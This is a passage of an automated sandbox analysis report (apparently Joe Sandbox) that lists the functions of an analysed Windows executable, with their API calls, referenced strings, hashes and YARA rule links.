Opcode ID: f1c492473199b312742630ce50a553060a0b9ea4eaacc9b47ea43307da62c793
Instruction ID: 68f391b2774ba09ea96552c72365f85ea97e68f0d825624862b4824abb057f86
Opcode Fuzzy Hash: f1c492473199b312742630ce50a553060a0b9ea4eaacc9b47ea43307da62c793
Instruction Fuzzy Hash: 8CF04F36E017596BCF115BA68C049DF7AA9EB88711B108032EE05B2250DB39DA458AA8

Function 0040324B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000000,00407699), ref: 00403259
LoadLibraryA.KERNEL32(user32.dll,00000000,00407699), ref: 00403263
GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00403275
FreeLibrary.KERNEL32(00000000), ref: 0040328E

Strings

SetLayeredWindowAttributes, xrefs: 0040326F
user32.dll, xrefs: 0040325E

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressLoadProc
String ID: SetLayeredWindowAttributes$user32.dll
API String ID: 1386263645-3673630139
Opcode ID: 6f4f77f8b42d0ab9d9921bb22e7f0633e3b4abeb14136758e52d57a767b6cc63
Instruction ID: 508ee469509ce2a81303781f6ead71e3a56e55b5475b293b8efb72fc7f039a29
Opcode Fuzzy Hash: 6f4f77f8b42d0ab9d9921bb22e7f0633e3b4abeb14136758e52d57a767b6cc63
Instruction Fuzzy Hash: 9CF082317003009BD7609F79ED447577BDCAF44712B24483EA985D2590D678D6808A14

Function 0040F115 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shell32.dll,0040F202,?,?,0040A2FE,00000000,?,emptybin,?,moverecyclebin,?,rasdial,?,inetdial,?,rasdialdlg), ref: 0040F123
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F13F
GetProcAddress.KERNEL32(SHEmptyRecycleBinA), ref: 0040F151

Strings

SHEmptyRecycleBinA, xrefs: 0040F141
SHGetSpecialFolderPathA, xrefs: 0040F139
shell32.dll, xrefs: 0040F11E

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHEmptyRecycleBinA$SHGetSpecialFolderPathA$shell32.dll
API String ID: 2238633743-3413488100
Opcode ID: 581fa2eb7aa84e403ad803d9283d580bd6f55d19ef43f57d3b0a13ffac35e7a6
Instruction ID: 358816b09f5cf14f0a8c17e475983ab2099924a059b021d90ca1dee1fadbbd52
Opcode Fuzzy Hash: 581fa2eb7aa84e403ad803d9283d580bd6f55d19ef43f57d3b0a13ffac35e7a6
Instruction Fuzzy Hash: B4E0BF74942218EAC7105BF5BD087C13EA8B754710702907BF914A27A0D77998988B5C

Function 0040F7B7 Relevance: 10.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F7D7
wcscpy.MSVCRT ref: 0040F81B
wcscpy.MSVCRT ref: 0040F834
memcmp.MSVCRT ref: 0040F86C
memcmp.MSVCRT ref: 0040F889
memcmp.MSVCRT ref: 0040F8CF
memcmp.MSVCRT ref: 0040F8F5
wcscpy.MSVCRT ref: 0040F911

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memcmp$wcscpy$memset
String ID:
API String ID: 2645737430-0
Opcode ID: 569751cad2242c83ee233c0caec67b1b752288b4dfec1d5f6af324c0f461c5ff
Instruction ID: a185caca4accc185db94d1b15df19a4a4f3c44e45ead4d0fb7599e0fa15f7159
Opcode Fuzzy Hash: 569751cad2242c83ee233c0caec67b1b752288b4dfec1d5f6af324c0f461c5ff
Instruction Fuzzy Hash: 17413FB2D00218ABDF10DB55C985EDEB7B8FF54314F0084BAE804A7295E774AB84CB95

Function 0040DE35 Relevance: 9.1, APIs: 6, Instructions: 143COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000,?,0040670F,?,?,?,?,?,?,?,bin), ref: 0040DE6E
memset.MSVCRT ref: 0040DECA
memset.MSVCRT ref: 0040DEDC

Part of subcall function 0040DC6C: strchr.MSVCRT ref: 0040DC85
Part of subcall function 0040DC6C: _mbscpy.MSVCRT ref: 0040DD1D

memset.MSVCRT ref: 0040DFBD
_mbscpy.MSVCRT ref: 0040DFE2
CloseHandle.KERNEL32(?,?,?,00000000,?,0040670F,?,?,?,?,?,?,?,bin,noascii,nohex), ref: 0040E02C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$_mbscpy$CloseHandleOpenProcessstrchr
String ID:
API String ID: 1762955152-0
Opcode ID: c9f5b38cd2bb14387c05b6e9d33b2ea8e4c943c113d1febc5a93918fbb27d101
Instruction ID: 3ec9d15c4d0ff2b0f3739c024993d8b579f8cdb1e0a900159d56b00f8823cef8
Opcode Fuzzy Hash: c9f5b38cd2bb14387c05b6e9d33b2ea8e4c943c113d1febc5a93918fbb27d101
Instruction Fuzzy Hash: DF513A719012189BEB21DFA1DD84BDE7BBCFF04340F1041AAF919A2291D7B4DA85CF68

Function 00407AF4 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407B16
_strcmpi.MSVCRT ref: 00407B40
CoInitialize.OLE32(00000000), ref: 00407BAB
memset.MSVCRT ref: 00407BC3

Strings

Failed to create the shortcut !, xrefs: 00407C13
common_desktop, xrefs: 00407B3A

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$Initialize_strcmpi
String ID: Failed to create the shortcut !$common_desktop
API String ID: 1727636871-3522837031
Opcode ID: c89bc6213b0406c9ef4e3ccfbb2741ee903cf2afa37e4de917d9679df9280615
Instruction ID: 8b057e69c421a6aad5f95a2eacbe0e8fc5b10904757b5b646500936ad7ac3ce9
Opcode Fuzzy Hash: c89bc6213b0406c9ef4e3ccfbb2741ee903cf2afa37e4de917d9679df9280615
Instruction Fuzzy Hash: 6B312BB390411C6BDB109B64DC85BDA77BC9B54354F1400BAF948F71C1D6B8FAC48B99

Function 00407C26 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407C48
_strcmpi.MSVCRT ref: 00407C72
CoInitialize.OLE32(00000000), ref: 00407CB7
memset.MSVCRT ref: 00407CCD

Strings

Failed to create the shortcut !, xrefs: 00407D21
common_desktop, xrefs: 00407C6C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$Initialize_strcmpi
String ID: Failed to create the shortcut !$common_desktop
API String ID: 1727636871-3522837031
Opcode ID: 0afc20c4c0532fcc45f75c03fc930cccd236ddd9c737a5e819b46d6c2e0a8990
Instruction ID: c5e697d6162886b22df4d0986660878d90a557d6ced7ef9782dedf35c4f0d7c4
Opcode Fuzzy Hash: 0afc20c4c0532fcc45f75c03fc930cccd236ddd9c737a5e819b46d6c2e0a8990
Instruction Fuzzy Hash: 0C2139739081186BE7209B55DC89FDB776C9F14314F0040BBF958F71C2DAB8AAC58BA9

Function 0040155D Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(?), ref: 00401571
GlobalUnWire.KERNEL32(?), ref: 00401592
GlobalSize.KERNEL32(?), ref: 0040157C

Part of subcall function 00402DFB: WriteFile.KERNEL32(?,?,0040161C,00000000,00000000,?,?,0040161C,?,?), ref: 00402E12

memset.MSVCRT ref: 004015B8
??2@YAPAXI@Z.MSVCRT ref: 004015D5
??3@YAXPAX@Z.MSVCRT ref: 0040161F

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Global$??2@??3@FileSizeWireWritememset
String ID:
API String ID: 217115826-0
Opcode ID: a3e94c4bb87033b8434b877ebf70879d1b61f74d8f630fc622babe24f9e38f80
Instruction ID: 9419d66bcd9dba4478d6399af0118c680bf903b0141ed144c7d6fbca291d275f
Opcode Fuzzy Hash: a3e94c4bb87033b8434b877ebf70879d1b61f74d8f630fc622babe24f9e38f80
Instruction Fuzzy Hash: 81215CB1900208FFDF119FE4CD45CAEBBB9FF08304B10882AF546A7261D776AA509B54

Function 0040252E Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00402539
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040254A
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00402551
ReleaseDC.USER32(00000000,00000000), ref: 00402559
GetWindowRect.USER32(?,?), ref: 00402566
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004025A4

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: CapsDeviceWindow$MoveRectRelease
String ID:
API String ID: 3197862061-0
Opcode ID: a1a3e5a7d4c5611e2dfcf82dc9d1b913f0b11f2bd4278a02d19f5b6f997ecd09
Instruction ID: d9f08ddc90771b881b67158836cc7b9c2442dbeff3b14118eade0b8f3e1096af
Opcode Fuzzy Hash: a1a3e5a7d4c5611e2dfcf82dc9d1b913f0b11f2bd4278a02d19f5b6f997ecd09
Instruction Fuzzy Hash: 3A115E31A0011AAFDB109FB9CD4DEEF7FB9EB84751F014165FA05E7260D670AD01CAA0

Function 0040E185 Relevance: 9.1, APIs: 6, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040E191
_strcmpi.MSVCRT ref: 0040E1A0
strchr.MSVCRT ref: 0040E1B1
memset.MSVCRT ref: 0040E1DD
_mbscpy.MSVCRT ref: 0040E1F2
strchr.MSVCRT ref: 0040E200

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: strchr$_mbscpy_strcmpimemset
String ID:
API String ID: 576810046-0
Opcode ID: 8f02f78ed4599b55b5ca2775329a651cdaede78c3b66270004c571e04045ca73
Instruction ID: 7a8f1cfe073f3a0e4f0d207cba5cda54e240bfa0d40924a8a1f0b8c4c336a51f
Opcode Fuzzy Hash: 8f02f78ed4599b55b5ca2775329a651cdaede78c3b66270004c571e04045ca73
Instruction Fuzzy Hash: D101D27114820869FB20A662CD16FDB369C9F14304F5004ABF589F90C3EEFCE9C086A9

Function 0040F21C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F115: LoadLibraryA.KERNEL32(shell32.dll,0040F202,?,?,0040A2FE,00000000,?,emptybin,?,moverecyclebin,?,rasdial,?,inetdial,?,rasdialdlg), ref: 0040F123
Part of subcall function 0040F115: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F13F
Part of subcall function 0040F115: GetProcAddress.KERNEL32(SHEmptyRecycleBinA), ref: 0040F151

memset.MSVCRT ref: 0040F271
RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,0040547C,?,?,?), ref: 0040F2B2
RegCloseKey.ADVAPI32(0040547C,?,?,?,?,?,?), ref: 0040F2E4
_mbscpy.MSVCRT ref: 0040F2F2

Part of subcall function 004023FF: GetVersionExA.KERNEL32(004162F0,00000104,00402439,004047E0,?,?,?,?,00000000,?), ref: 00402419

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F292, 0040F2A8

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$CloseLibraryLoadOpenVersion_mbscpymemset
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 3616037016-2036018995
Opcode ID: 17b1f62fe2048fce06dbb01fa1f0a8f2fad16fa5e3d01031b7466c682c8fa380
Instruction ID: 11552b202ba6acbcb19286cf562ec08a03818177671fb195257c312d08f528e2
Opcode Fuzzy Hash: 17b1f62fe2048fce06dbb01fa1f0a8f2fad16fa5e3d01031b7466c682c8fa380
Instruction Fuzzy Hash: 5621DB76800218BEEB30A6949C89DEF77AC9B09304F5100FBFD11B25D2D67A9ECC965D

Function 0040EB42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EB62
GetClassNameA.USER32(?,00000000,000000FF), ref: 0040EB76
_strcmpi.MSVCRT ref: 0040EB88
EnumChildWindows.USER32(?,Function_0000EAC7,?), ref: 0040EBA0

Strings

RegEdit_RegEdit, xrefs: 0040EB82

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ChildClassEnumNameWindows_strcmpimemset
String ID: RegEdit_RegEdit
API String ID: 3222542750-157708615
Opcode ID: a286787a4daa6ec75f723a690ee0b5da6a0a4cc0b10a4dd347cda027d92e6d4e
Instruction ID: 7718ebed06378b6a9df5c6e1c075143ecd23c8014415ffea57366fd316ada116
Opcode Fuzzy Hash: a286787a4daa6ec75f723a690ee0b5da6a0a4cc0b10a4dd347cda027d92e6d4e
Instruction Fuzzy Hash: 7FF0493250011A6AD721E7269C01FEB73ACAF59304F1000B3F901F21C1E6B8AA404BA8

Function 004059E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 004059F7
sprintf.MSVCRT ref: 00405A1F
MessageBoxA.USER32(?,?,Error,00000030), ref: 00405A48

Strings

Error %d: %s, xrefs: 00405A19
Error, xrefs: 00405A39

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: e40f87e164fceb169b81995f9388c9f0be76e8a3efcbe465a6244cd02b9007d3
Instruction ID: 8f99f09f2c946179dff47e3d5b446a277154dc52d41e427cf839fd2f267041ab
Opcode Fuzzy Hash: e40f87e164fceb169b81995f9388c9f0be76e8a3efcbe465a6244cd02b9007d3
Instruction Fuzzy Hash: B6F090B650020866D720A764DC05BDBB2FCBB44744F14417AAB45F2190EBB89A898FAD

Function 00405072 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040507D
GetProcAddress.KERNEL32(00000000,DllUnregisterServer), ref: 0040509C
FreeLibrary.KERNEL32(00000000), ref: 004050AE

Strings

DllRegisterServer, xrefs: 0040508F
DllUnregisterServer, xrefs: 00405096

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: DllRegisterServer$DllUnregisterServer
API String ID: 145871493-2931954178
Opcode ID: 8d155a9baae625b6f410fcf510d096983f249a7cf484d85348d48b45f3859d2c
Instruction ID: 293957d507e2e6af4d633f8260c06d9890627f7da330c299c3811550d654a46b
Opcode Fuzzy Hash: 8d155a9baae625b6f410fcf510d096983f249a7cf484d85348d48b45f3859d2c
Instruction Fuzzy Hash: 4DE02B31649670A7C1321B25AC489EF7E50DBC5F71B204733F216F11E0CB7848858ADB

Function 0040D8EB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000000,00000000,0040D9A4,?,?,?,?,?,00000000,?), ref: 0040D8F4
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040D906
FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D921

Strings

advapi32.dll, xrefs: 0040D8ED
AdjustTokenPrivileges, xrefs: 0040D900

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: AdjustTokenPrivileges$advapi32.dll
API String ID: 145871493-1468017929
Opcode ID: d138519ee493b2230bef64027d2425524a1101c5d663b8bc3963f33105991f9b
Instruction ID: c68d85fffd68c44b0ab711b937c0fe88b95f618a9e7b60f9ac353f5a49a56c20
Opcode Fuzzy Hash: d138519ee493b2230bef64027d2425524a1101c5d663b8bc3963f33105991f9b
Instruction Fuzzy Hash: 56E048317021707B82221B966C4CCEFAD69DE8DB617054126F509E2560C6244981D6E9

Function 0040D9BF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,?,0040A4F7,00000000,00000000,00000000,00000000,reboot,force), ref: 0040D9C8
GetProcAddress.KERNEL32(00000000,InitiateSystemShutdownA), ref: 0040D9DA
FreeLibrary.KERNEL32(00000000,?,?,0040A4F7,00000000,00000000,00000000,00000000,reboot,force), ref: 0040D9FA

Strings

advapi32.dll, xrefs: 0040D9C1
InitiateSystemShutdownA, xrefs: 0040D9D4

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: InitiateSystemShutdownA$advapi32.dll
API String ID: 145871493-3694336717
Opcode ID: e39d563d27479f34b7ba41e2568ac911dadcf8151c2a561a566c1ded7058b63b
Instruction ID: b1dd786151b6efa23bbaa3071aa3cecd87003013ca0dddd80b812ad79f5d4e2a
Opcode Fuzzy Hash: e39d563d27479f34b7ba41e2568ac911dadcf8151c2a561a566c1ded7058b63b
Instruction Fuzzy Hash: 45E0D832705220AB82125FD59C48DDFFE65DBCCB507014426F201E2130C73589C79BDA

Function 0040DA97 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(wininet.dll,?,?,0040A128,?,?,?), ref: 0040DAA3
GetProcAddress.KERNEL32(00000000,InternetDialA), ref: 0040DAB5
FreeLibrary.KERNEL32(00000000,?,?,0040A128,?,?,?), ref: 0040DAD7

Strings

InternetDialA, xrefs: 0040DAAF
wininet.dll, xrefs: 0040DA99

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: InternetDialA$wininet.dll
API String ID: 145871493-1140072840
Opcode ID: 2e211fdf805ea58b72b906c5271e3a5a1d7e0acd2373f0eca31d6d72dc8ba2d0
Instruction ID: 00987d0c9695cf7b3aa1c00be420f87b256b0381b609b8b8be4192b2fbca685a
Opcode Fuzzy Hash: 2e211fdf805ea58b72b906c5271e3a5a1d7e0acd2373f0eca31d6d72dc8ba2d0
Instruction Fuzzy Hash: 84E09235B053116BC7215F91AC04FCB3E55DBC8751F158032F702E16A0CA74CD4A8AA9

Function 0040D8AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000000,00000000,0040D98A,?,?,?,00000000,?), ref: 0040D8B6
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040D8C8
FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D8E0

Strings

advapi32.dll, xrefs: 0040D8AF
LookupPrivilegeValueA, xrefs: 0040D8C2

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: LookupPrivilegeValueA$advapi32.dll
API String ID: 145871493-2285166706
Opcode ID: 11c3ce75e322bb59fcbb006c9e5098f637649e0e297612a7fc5276d6978ff4ca
Instruction ID: 4e079f71e855da7bcfd721fbe88b7553077cccf5ca06609068d04539f95bbb43
Opcode Fuzzy Hash: 11c3ce75e322bb59fcbb006c9e5098f637649e0e297612a7fc5276d6978ff4ca
Instruction Fuzzy Hash: BAE02632B011506B83222BAA6C488EF7E559AC96017198537F722E2160C7298C869669

Function 004046B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00100000,00000000,fI@,00000000,00404966), ref: 004046C3
WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 004046D5
